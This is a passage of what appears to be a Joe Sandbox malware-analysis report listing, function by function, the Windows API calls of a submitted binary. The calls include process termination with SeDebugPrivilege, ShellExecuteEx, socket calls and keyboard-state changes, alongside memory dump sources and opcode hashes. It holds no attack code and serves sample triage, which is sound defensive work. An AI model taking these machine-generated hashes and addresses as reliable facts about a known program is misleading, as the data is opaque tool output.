                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: bb4210be0cfd2046e0ff3115e62f183e8bce0df2f978b160da53afb839fa00ac
                                          • Instruction ID: d5d2057f1f752ab2ea6f67cc12c401e3dc0442cce9e6d6cf754c19ae17c743cb
                                          • Opcode Fuzzy Hash: bb4210be0cfd2046e0ff3115e62f183e8bce0df2f978b160da53afb839fa00ac
                                          • Instruction Fuzzy Hash: 82911771D00229EFDB10DFA5DC81ADEBBB9EF48710F108169F519A7291EB719A44CFA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00986E24
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00986E38
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00986E52
                                          • _wcscat.LIBCMT ref: 00986EAD
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00986EC4
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00986EF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: f92d124fda5766628e9c59ad5cfbca8db13cd75c2594269497cb5ddaadb003a7
                                          • Instruction ID: 8ea20aec4374c799074b59498515bda275b23fa725bf22b4ad4ec74502f6980a
                                          • Opcode Fuzzy Hash: f92d124fda5766628e9c59ad5cfbca8db13cd75c2594269497cb5ddaadb003a7
                                          • Instruction Fuzzy Hash: 53419171A00348AFDB21AF64CC85BEE77A8EF48354F10052AF584AB2D2D6719D948B60
                                          APIs
                                            • Part of subcall function 00963C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00963C7A
                                            • Part of subcall function 00963C55: Process32FirstW.KERNEL32(00000000,?), ref: 00963C88
                                            • Part of subcall function 00963C55: CloseHandle.KERNEL32(00000000), ref: 00963D52
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0097E9A4
                                          • GetLastError.KERNEL32 ref: 0097E9B7
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0097E9E6
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0097EA63
                                          • GetLastError.KERNEL32(00000000), ref: 0097EA6E
                                          • CloseHandle.KERNEL32(00000000), ref: 0097EAA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 87478a89df95e7770d72e658a3428cd4ea40ef27704ee7dcd76f79f8d5f7043c
                                          • Instruction ID: 1f9e0cb5290e8bd5777cf6641e1dab0316d919a3092a2dcaea308a373af8abed
                                          • Opcode Fuzzy Hash: 87478a89df95e7770d72e658a3428cd4ea40ef27704ee7dcd76f79f8d5f7043c
                                          • Instruction Fuzzy Hash: DD41AA723042009FDB14EF24CCA5F6EB7A5AF88314F04C459F9069B3D2DB74A808CB91
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00963033
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 05ea55bf08adcbb6d1d509abfeb80f566b88a6fa58b48e5ec7126d2523445959
                                          • Instruction ID: 6705aaeaad457d14cc568add7d089a591ee0f3a2c4fba79b06c2f68ee6536e86
                                          • Opcode Fuzzy Hash: 05ea55bf08adcbb6d1d509abfeb80f566b88a6fa58b48e5ec7126d2523445959
                                          • Instruction Fuzzy Hash: 3E115C3134C347BEE7249B54EC42DAF7B9CDF19374B20406AF900A62C1DBB46F4466A0
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00964312
                                          • LoadStringW.USER32(00000000), ref: 00964319
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0096432F
                                          • LoadStringW.USER32(00000000), ref: 00964336
                                          • _wprintf.LIBCMT ref: 0096435C
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0096437A
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00964357
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: 5a0d33b203e5cb43ffada98d0c32a05219b6ad2c8a5f2379e0c090f90ff6a900
                                          • Instruction ID: 29c5617b5678d612a9521c81b2699dad43cff64e188f267872adde0ab435ccce
                                          • Opcode Fuzzy Hash: 5a0d33b203e5cb43ffada98d0c32a05219b6ad2c8a5f2379e0c090f90ff6a900
                                          • Instruction Fuzzy Hash: A50162F390420CBFE711A7A0DE89EF7776CEB08300F0015A1BB45E6151EA795E855B71
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • GetSystemMetrics.USER32(0000000F), ref: 0098D47C
                                          • GetSystemMetrics.USER32(0000000F), ref: 0098D49C
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0098D6D7
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0098D6F5
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0098D716
                                          • ShowWindow.USER32(00000003,00000000), ref: 0098D735
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0098D75A
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0098D77D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: 9b5ff573c7809cb5e57662430ce35819ba1161e8acaf4b93cbb5b0088ba611f8
                                          • Instruction ID: 10808a75c0f2fc6e11068a14eb53c62359f804a32e2b46d47456349dee296acc
                                          • Opcode Fuzzy Hash: 9b5ff573c7809cb5e57662430ce35819ba1161e8acaf4b93cbb5b0088ba611f8
                                          • Instruction Fuzzy Hash: 84B19B71601219EFDF14DF68C9C5BAD7BB5BF08711F088169EC489B399E734A990CB90
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0093C1C7,00000004,00000000,00000000,00000000), ref: 00902ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0093C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00902B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0093C1C7,00000004,00000000,00000000,00000000), ref: 0093C21A
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0093C1C7,00000004,00000000,00000000,00000000), ref: 0093C286
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: f60d5c80d9f5eb141ea11ed2dda6149c0d75d1093e008b8a4e97aea5153b25f2
                                          • Instruction ID: 7ef53f08a9019094d2043170ed001423ad6bb36606d951d5498c76817dbb2218
                                          • Opcode Fuzzy Hash: f60d5c80d9f5eb141ea11ed2dda6149c0d75d1093e008b8a4e97aea5153b25f2
                                          • Instruction Fuzzy Hash: 70412C70718A80DEDB358B688C9CB6B7B99AB85314F148C1DE057965E0CA79E881EB20
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 009670DD
                                            • Part of subcall function 00920DB6: std::exception::exception.LIBCMT ref: 00920DEC
                                            • Part of subcall function 00920DB6: __CxxThrowException@8.LIBCMT ref: 00920E01
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00967114
                                          • EnterCriticalSection.KERNEL32(?), ref: 00967130
                                          • _memmove.LIBCMT ref: 0096717E
                                          • _memmove.LIBCMT ref: 0096719B
                                          • LeaveCriticalSection.KERNEL32(?), ref: 009671AA
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009671BF
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 009671DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: 0836891979ccf85a700b18cc95f7eb9abc75acfad521d3af49495b52d7bad04c
                                          • Instruction ID: 303162078317dfcf1b5b2f2aa2082efe50abe943c839e25ab270435e1245ea99
                                          • Opcode Fuzzy Hash: 0836891979ccf85a700b18cc95f7eb9abc75acfad521d3af49495b52d7bad04c
                                          • Instruction Fuzzy Hash: 3A318D31904215EBCF00DFA4EC85AAEB7B8EF85710F1541B6F904AB256DB30DE54DBA0
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 009861EB
                                          • GetDC.USER32(00000000), ref: 009861F3
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009861FE
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0098620A
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00986246
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00986257
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0098902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00986291
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009862B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: b3b99463ac934e06f43f91cabcefeeb046a81f024badc4d48c61e82d5b898eb0
                                          • Instruction ID: d5c702b9463da333f6db225ce2d7af2171bafebea27add18701e114639b91fa2
                                          • Opcode Fuzzy Hash: b3b99463ac934e06f43f91cabcefeeb046a81f024badc4d48c61e82d5b898eb0
                                          • Instruction Fuzzy Hash: 02318B72214214BFEF109F10CC9AFEA3BADEF4A765F040065FE08DE292D6759841DB60
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: b31b16ebec30039712b10da77bd17f438ba01d9b797d14512d902a207f720f26
                                          • Instruction ID: 74f752576f64bd35a470cab26abe5dc18f4c2817a07454087ee0193dbfbcbc0b
                                          • Opcode Fuzzy Hash: b31b16ebec30039712b10da77bd17f438ba01d9b797d14512d902a207f720f26
                                          • Instruction Fuzzy Hash: B72104616002157BAA04F71AED42FFB735C9EA138DF044021FD089624BEB64DE28C3E5
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                            • Part of subcall function 0091FC86: _wcscpy.LIBCMT ref: 0091FCA9
                                          • _wcstok.LIBCMT ref: 0096EC94
                                          • _wcscpy.LIBCMT ref: 0096ED23
                                          • _memset.LIBCMT ref: 0096ED56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: 7aba536f6fe738cd3ae46048bf5b281858ef82c865f5558cd8e0fe755d3f1c58
                                          • Instruction ID: 7d72d5eef3cec42f2b7400b882fd23f2fe9585b094ca0a9d0804d279d14c67a1
                                          • Opcode Fuzzy Hash: 7aba536f6fe738cd3ae46048bf5b281858ef82c865f5558cd8e0fe755d3f1c58
                                          • Instruction Fuzzy Hash: 25C16E755083019FC714EF64D895B6AB7E4FF85324F00892DF8999B2A2DB31EC45CB82
                                          APIs
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00976C00
                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00976C21
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00976C34
                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00976CEA
                                          • inet_ntoa.WSOCK32(?), ref: 00976CA7
                                            • Part of subcall function 0095A7E9: _strlen.LIBCMT ref: 0095A7F3
                                            • Part of subcall function 0095A7E9: _memmove.LIBCMT ref: 0095A815
                                          • _strlen.LIBCMT ref: 00976D44
                                          • _memmove.LIBCMT ref: 00976DAD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3619996494-0
                                          • Opcode ID: 0d5f3f93b48194f7e7432f088192c7ba87659f00295703ef594b697ac7bd2c0a
                                          • Instruction ID: 2661f200e88d3d36432f87699dc9834d3b8647b973882b0c25596ddb410a1aec
                                          • Opcode Fuzzy Hash: 0d5f3f93b48194f7e7432f088192c7ba87659f00295703ef594b697ac7bd2c0a
                                          • Instruction Fuzzy Hash: 0881B072208700AFD720EB24CC92F6BB7A8AFC5714F548A1DF9599B2D2DA70ED05CB51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 802cc8ff4ef162f96c789eab34d6060be3840fa818e05214af95480a1ea96112
                                          • Instruction ID: 368941e57125299a4ce3ed8323722cfa5309b7afe0ff4975d9ea650706c2abb3
                                          • Opcode Fuzzy Hash: 802cc8ff4ef162f96c789eab34d6060be3840fa818e05214af95480a1ea96112
                                          • Instruction Fuzzy Hash: 07715931904109EFCB15DF98CC89ABEBB79FF85314F248159F915AB2A1C734AA51CFA0
                                          APIs
                                          • IsWindow.USER32(01026608), ref: 0098B3EB
                                          • IsWindowEnabled.USER32(01026608), ref: 0098B3F7
                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0098B4DB
                                          • SendMessageW.USER32(01026608,000000B0,?,?), ref: 0098B512
                                          • IsDlgButtonChecked.USER32(?,?), ref: 0098B54F
                                          • GetWindowLongW.USER32(01026608,000000EC), ref: 0098B571
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0098B589
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: 06fc42abe21187b7d65ffb0878d975b193cb27f601331cd400d00c9de36107f1
                                          • Instruction ID: 3ed0ef9ed13c63d6570b28e5cd93171bdeed7a211d276d72d58bd5dfbcdaa6c8
                                          • Opcode Fuzzy Hash: 06fc42abe21187b7d65ffb0878d975b193cb27f601331cd400d00c9de36107f1
                                          • Instruction Fuzzy Hash: 5E71B034A05704EFDB20AF64C8A5FBA7BB9EF49300F184559F946973B2C735A980DB50
                                          APIs
                                          • _memset.LIBCMT ref: 0097F448
                                          • _memset.LIBCMT ref: 0097F511
                                          • ShellExecuteExW.SHELL32(?), ref: 0097F556
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                            • Part of subcall function 0091FC86: _wcscpy.LIBCMT ref: 0091FCA9
                                          • GetProcessId.KERNEL32(00000000), ref: 0097F5CD
                                          • CloseHandle.KERNEL32(00000000), ref: 0097F5FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: 1eea41d2f97ec4451819e3a378f0b23af362e625d1a89442b437a7f67a185bd9
                                          • Instruction ID: 0c9682d9143a4e5f8cd195e1b0fc1f010aba300993c91898bc81927d0afe861c
                                          • Opcode Fuzzy Hash: 1eea41d2f97ec4451819e3a378f0b23af362e625d1a89442b437a7f67a185bd9
                                          • Instruction Fuzzy Hash: CA616EB5A006199FCB14DF64C495AAEBBF5FF89310F148469E859BB391CB30AD41CB90
                                          APIs
                                          • GetParent.USER32(?), ref: 00960F8C
                                          • GetKeyboardState.USER32(?), ref: 00960FA1
                                          • SetKeyboardState.USER32(?), ref: 00961002
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00961030
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0096104F
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00961095
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009610B8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 2de8461da22dce88e014a4a17b961fa6ad0cc05adf65a7d7356115c8783796e2
                                          • Instruction ID: cef52c35953cf5d1eb3e9a53df9a96667c6225d294b99dae432941b96a44f15b
                                          • Opcode Fuzzy Hash: 2de8461da22dce88e014a4a17b961fa6ad0cc05adf65a7d7356115c8783796e2
                                          • Instruction Fuzzy Hash: 5D51D1A06087D53EFB3642348C55BBBBEAD5B46304F0C8989E1D4868D2D299ECD8D751
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00960DA5
                                          • GetKeyboardState.USER32(?), ref: 00960DBA
                                          • SetKeyboardState.USER32(?), ref: 00960E1B
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00960E47
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00960E64
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00960EA8
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00960EC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
